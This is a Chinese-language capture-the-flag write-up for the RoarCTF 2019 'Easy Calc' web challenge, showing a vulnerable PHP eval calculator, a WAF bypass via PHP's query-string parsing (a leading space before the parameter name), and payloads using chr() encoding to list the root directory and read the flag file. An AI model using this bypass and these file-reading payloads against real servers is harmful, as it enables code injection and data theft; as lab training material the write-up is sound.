BUUCTF WEB [RoarCTF 2019]Easy Calc
-
F12查看页面源代码
<!DOCTYPE html> <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>简单的计算器</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="./libs/bootstrap.min.css"> <script src="./libs/jquery-3.3.1.min.js"></script> <script src="./libs/bootstrap.min.js"></script> </head> <body> <div class="container text-center" style="margin-top:30px;"> <h2>表达式</h2> <form id="calc"> <div class="form-group"> <input type="text" class="form-control" id="content" placeholder="输入计算式" data-com.agilebits.onepassword.user-edited="yes"> </div> <div id="result"><div class="alert alert-success"> </div></div> <button type="submit" class="btn btn-primary">计算</button> </form> </div> <!--I've set up WAF to ensure security.--> <script> $('#calc').submit(function(){ $.ajax({ url:"calc.php?num="+encodeURIComponent($("#content").val()), type:'GET', success:function(data){ $("#result").html(`<div class="alert alert-success"> <strong>答案:</strong>${data} </div>`); }, error:function(){ alert("这啥?算不来!"); } }) return false; }) </script> </body></html>
访问calc.php
<?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blacklist as $blackitem) { if (preg_match('/' . $blackitem . '/m', $str)) { die("what are you want to do?"); } } eval('echo '.$str.';'); } ?>
-
可以看出原页面通过js将表达式传给calc.php,同时calc.php对传入的参数进行了一些限制后使用eval函数输出结果
-
尝试提交非数字的字符报错,可能是num变量被waf过滤
-
这里需要利用PHP的
字符串解析特性
PHP会将查询字符串(在URL或正文中)转换为内部$_GET等关联数组
/?foo=bar会变成Array([foo] => "bar")
在这个过程中某些字符会被删除或用下划线代替
/?%20news[id%00=42会变成Array([news_id] => 42)
所以在num前加个空格后WAF会找不到num这个变量,而PHP会将参数转换为有效的变量名,将空格删除
-
尝试扫描当前文件夹
? num=1;var_dump(scandir(chr(47)))
1array(24) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(4) "boot" [5]=> string(3) "dev" [6]=> string(3) "etc" [7]=> string(5) "f1agg" [8]=> string(4) "home" [9]=> string(3) "lib" [10]=> string(5) "lib64" [11]=> string(5) "media" [12]=> string(3) "mnt" [13]=> string(3) "opt" [14]=> string(4) "proc" [15]=> string(4) "root" [16]=> string(3) "run" [17]=> string(4) "sbin" [18]=> string(3) "srv" [19]=> string(8) "start.sh" [20]=> string(3) "sys" [21]=> string(3) "tmp" [22]=> string(3) "usr" [23]=> string(3) "var" }
找到flag文件f1agg
-
读取flag文件
? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
1string(43) "flag{78db4d11-a484-4a97-b58b-a0b1d010f7b9} "